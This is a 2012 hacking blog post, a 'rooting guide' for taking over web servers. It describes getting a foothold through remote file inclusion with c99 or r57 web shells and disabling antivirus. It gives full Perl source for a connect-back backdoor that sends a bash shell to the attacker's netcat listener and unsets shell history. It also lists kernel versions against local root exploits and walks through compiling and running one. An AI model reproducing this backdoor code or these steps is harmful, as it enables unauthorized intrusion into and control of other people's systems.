BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly

 

Saturday, January 28, 2012

rooting Guide

0 comments

Shell Access on a website is the first thing you will need. How you gain this access
is entirely up to you. I would say most people will end up going with a simple remote
file inclusion and place yourself a c99, r57, locust or any shell of your choice.


You will want to get yourself a version of NetCat Which you can find at this location




http://www.vulnwatch.org/netcat/nc111nt.zip




If you have an antivirus that auto deletes infected files or virii i would suggest disabling
it as some av's will detect netcat as a hacktool or remote admin tool. Once you have downloaded
netcat open netcat up and it will ask you to enter a string for the command line. Reading up on
netcat is recommended but if your lazy a string like this will do just fine


ex:
-vv -l -n -p 




From there you will want to aquire a nice back-connect. I preffer to use one thats not
in the shell because i find that those back connects work shitty so i will provide you
with one that i use. Very simple to use just save as "bc.pl" then upload to server and 
end execute. 


ex: 
perl bc.pl  




#!/usr/bin/perl
use IO::Socket;
#   Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell                
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90                                                                               
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV; print "IHS BACK-CONNECT BACKDOOR\n\n"; if ($ARGC!=2) { 
   print "Usage: $0 [Host] [Port] \n\n"; 
   die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; 
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n"; print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush(); 
open(STDIN, ">&SOCKET"); 
open(STDOUT,">&SOCKET"); 
open(STDERR,">&SOCKET"); print "IHS BACK-CONNECT BACKDOOR  \n\n"; 
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); 
system($system);
#EOF




**Note that if you are running a router or wireless on multiple ips set by your dhcp you might have to 
forward the to what ever the ip of your computer is. You can check this by opening 
command prompt and typing ipconfig you should get an ip that looks similar to 192.168.1.100
which is the ip to forward to. If you are unsure about how to forward your port check out this site and
find your router model.




http://portforward.com/routers.htm




So Now that you have your tools and you have your shell access open up netcat and type in -vv -l -n -p 8080
for this tutorial we will connect on port 8080. Hit enter and it should start listening. 


Go back to the server and upload your bc.pl. Execute the back connect with a command such as perl bc.pl 8080.
once you execute this you can go back to the shell and it should have connected. With this particular back connect
you don't have to find the kernel version because it displays it for you once it connects, but for those of you who
are using a different back connect to find the os kernel version and userid you can type something like this into the
shell and it will give you the info.


uname -a;id




Once executed you will see something probably similar to


Linux alexandra.adm24.de 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)




The important information here that you want is the OS & Kernel Ver. which in this case would be
Linux and the kernel ver. is 2.6.8-2 and you can see the last update of it was in 2005 so it's fairly
old. which is a good thing for us.


Here is a kernel refrence for you all this will tell you what exploits work for the differenet kernels.
just to give you a general idea. note that this refrence is kind of old but is still pretty accurate but
there could be newer exploits now.


2.2 ->  ptrace2.4.17 -> newlocal, kmod, uselib242.4.18 -> brk, brk2, newlocal, kmod2.4.19 -> brk, brk2, newlocal, kmod2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk22.4.21 -> brk, brk2, ptrace, ptrace-kmod2.4.22 -> brk, brk2, ptrace, ptrace-kmod2.4.22-10 -> loginx2.4.23 -> mremap_pte2.4.24 -> mremap_pte, uselib242.4.25-1 -> uselib242.4.27 -> uselib242.6.2 -> mremap_pte, krad, h00lyshit2.6.5 -> krad, krad2, h00lyshit2.6.6 -> krad, krad2, h00lyshit2.6.7 -> krad, krad2, h00lyshit2.6.8 -> krad, krad2, h00lyshit2.6.8-5 -> krad2, h00lyshit2.6.9 -> krad, krad2, h00lyshit2.6.9-34 -> r00t, h00lyshit2.6.10 -> krad, krad2, h00lyshit2.6.13 -> raptor, raptor2, h0llyshit, prctl2.6.14 -> raptor, raptor2, h0llyshit, prctl2.6.15 -> raptor, raptor2, h0llyshit, prctl2.6.16 -> raptor, raptor2, h0llyshit, prctl2.6.23 - 2.6.24 -> diane_lane_fucked_hard.c2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c




Once you have found the Kernel ver. of the server you are about to root you need to find the Local Root Exploit
for that kernel which you can find with google using the list above. Once you have found your Exploit you will want
to compile it assuming it's in c which most are. To compile your xpl.c what you want to do is place the xpl.c on the
server where you placed you bc.pl and then compile it. To Compile your c scripts go to your shell that you have
spawned with netcat and type:
ex:
gcc xpl.c -o xpl




This will compile your xpl.c to a file named xpl.


From here now all you have to do is run your exploit which can be done by simply typing in your netcat connection


./xpl




it should execute the exploit file which you have just compiled and give you root depending on what the exploit requires.
some require nothing but running them. others such as h0llyshit require a large file to exploit or to be made to exploit. 
but this is just to explain how to root. you can read up on h0llyshit from here if you would like.





©2011, copyright BLACK BURN

0 comments:

Post a Comment

 

7 Years Earning Experience

The Earning Source You Can Trust

Follow by Email